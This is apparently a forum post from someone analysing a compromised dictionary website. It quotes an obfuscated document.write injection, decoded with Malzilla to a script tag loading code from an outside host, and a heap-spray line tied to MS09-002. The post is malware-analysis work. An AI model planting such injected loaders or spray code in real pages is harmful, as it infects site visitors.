Hi,
Where did you get the s1 and s2 scripts? I didn't see them initially. edit2: found these myself!
How is the site infected? I didn't see anything on the source code of the page, and am not sure where else to look exactly!

edit: Found it! So simple, and I overlooked it once already. In the common.js script that loads from the yourdictionary.com site, there is this line:
document.XXXwrite(String.fromCharCode(60,83,67,82,73,80,84,32,76,65,78,71,85,65,71,69,61,34,74,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,98,115,101,117,46,99,111,109,47,99,111,109,109,111,110,46,106,115,34,62,60,47,115,99,114,105,112,116,62,10));
Malzilla decodes this for me:
<SCRIPT LANGUAGE="Javascript" src="http://www.rbseu.com/common.js"></script>
Also, I'd like to decompile the SWF file, but had no luck with either Flare or SWFScan. Are there other tools that may be able to do it?
It looks like the m1/m2 scripts are triggering the MS09-002 vulnerability.
for(var x=0;x<1000;x++)ruix1.push(document.createElement("i"+"mg"));